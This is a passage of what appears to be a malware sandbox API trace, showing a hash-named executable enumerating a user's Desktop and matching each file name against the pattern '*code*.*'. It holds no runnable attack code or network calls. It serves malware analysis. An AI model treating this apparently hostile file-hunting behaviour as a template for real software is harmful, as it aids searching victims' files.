lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970b60 [0110.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970b60, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.924] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*code*.*") returned 0 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.924] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.924] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.924] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.924] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.924] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.924] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.924] lstrcatW (in: lpString1="\\", lpString2="7eG9d7.mp4" | out: lpString1="\\7eG9d7.mp4") returned="\\7eG9d7.mp4" [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d20 [0110.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d20, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.924] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.924] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*code*.*") returned 0 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.925] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.925] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.925] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.925] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.925] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.925] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.925] lstrcatW (in: lpString1="\\", lpString2="desktop.ini" | out: lpString1="\\desktop.ini") returned="\\desktop.ini" [0110.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d60 [0110.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d60, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d60 | out: hHeap=0x29a0000) returned 1 [0110.925] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*code*.*") returned 0 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.925] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.925] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.925] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.925] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.925] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.926] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.926] lstrcatW (in: lpString1="\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd0) returned 0x29a04a0 [0110.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a11c0 [0110.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a1230 [0110.926] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.926] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970f00 [0110.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970f00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.926] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.926] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*code*.*") returned 0 [0110.926] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970498 | out: hHeap=0x29a0000) returned 1 [0110.926] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1230 | out: hHeap=0x29a0000) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.926] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.926] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.926] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.926] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.926] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.926] lstrcatW (in: lpString1="\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="\\fmnAnasf2I.mp4") returned="\\fmnAnasf2I.mp4" [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ba0 [0110.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ba0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.927] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*code*.*") returned 0 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.927] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.927] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.927] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.927] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.927] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.927] lstrcatW (in: lpString1="\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="\\g3fX8Y8-txe9_Es.m4a") returned="\\g3fX8Y8-txe9_Es.m4a" [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea898 [0110.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea898, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea898 | out: hHeap=0x29a0000) returned 1 [0110.927] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c00 [0110.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.927] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970600 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.928] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*code*.*") returned 0 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970600 | out: hHeap=0x29a0000) returned 1 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a98 | out: hHeap=0x29a0000) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.928] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.928] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.928] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.928] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.928] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.928] lstrcatW (in: lpString1="\\", lpString2="Izq83dPIx.mp4" | out: lpString1="\\Izq83dPIx.mp4") returned="\\Izq83dPIx.mp4" [0110.928] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.928] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.928] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.928] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c40 [0110.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.928] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.928] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*code*.*") returned 0 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.928] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, 